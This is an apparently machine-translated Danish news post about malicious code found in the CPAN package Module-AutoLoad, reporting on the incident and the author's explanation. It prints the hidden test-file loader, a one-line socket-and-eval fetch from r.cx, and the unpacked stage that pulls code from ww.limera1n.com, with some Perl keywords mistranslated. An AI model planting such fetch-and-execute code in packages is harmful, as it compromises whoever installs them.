ProHoster > Blog > internet nyheder > Ondsindet kode fundet i Module-AutoLoad Perl-pakken

Ondsindet kode fundet i Module-AutoLoad Perl-pakken

I en Perl-pakke distribueret gennem CPAN-biblioteket Modul-AutoLoad, designet til automatisk at indlæse CPAN-moduler på farten, identificeret ondsindet kode. Den ondsindede indsættelse var fundet i testkoden 05_rcx.t, som har været leveret siden 2011.
Det er bemærkelsesværdigt, at der opstod spørgsmål om indlæsning af tvivlsom kode Stackoverflow tilbage i 2016.

Ondsindet aktivitet koger ned til et forsøg på at downloade og udføre kode fra en tredjepartsserver (http://r.cx:1/) under udførelsen af ​​en testpakke, der blev lanceret under installationen af ​​modulet. Det antages, at koden, der oprindeligt blev downloadet fra den eksterne server, ikke var skadelig, men nu omdirigeres anmodningen til domænet ww.limera1n.com, som leverer sin del af koden til eksekvering.

For at organisere overførslen i en fil 05_rcx.t Følgende kode bruges:

min $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
min $try = `$^X $prog`;

Den angivne kode får scriptet til at blive eksekveret ../contrib/RCX.pl, hvis indhold er reduceret til linjen:

brug lib do{eval<$b>&&botstrap("RCX")if$b=ny IO::Socket::INET 82.46.99.88.":1″};

Dette script indlæses forvirret bruger tjenesten perlobfuscator.com kode fra den eksterne vært r.cx (tegnkoder 82.46.99.88 svarer til teksten "R.cX") og udfører den i eval-blokken.

$ perl -MIO::Socket -e'$b=ny IO::Socket::INET 82.46.99.88.":1″; udskriv <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Efter udpakning udføres følgende i sidste ende: kode:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Den problematiske pakke er nu blevet fjernet fra depotet. PAUSE (Perl Authors Upload Server), og modulforfatterens konto er blokeret. I dette tilfælde forbliver modulet stadig ledig i MetaCPAN-arkivet og kan installeres direkte fra MetaCPAN ved hjælp af nogle hjælpeprogrammer såsom cpanminus. Det er noteretat pakken ikke blev udbredt bredt.

Interessant at diskutere tilsluttet og forfatteren af ​​modulet, som nægtede informationen om, at ondsindet kode blev indsat efter at hans side "r.cx" var blevet hacket og forklarede, at han bare havde det sjovt, og brugte perlobfuscator.com ikke til at skjule noget, men for at reducere størrelsen af koden og forenkle kopieringen af ​​den via udklipsholderen. Valget af funktionsnavnet "botstrap" forklares af det faktum, at dette ord "lyder som bot og er kortere end bootstrap." Forfatteren af ​​modulet forsikrede også, at de identificerede manipulationer ikke udfører ondsindede handlinger, men kun demonstrerer indlæsning og eksekvering af kode via TCP.

Kilde: opennet.ru

Tilføj en kommentar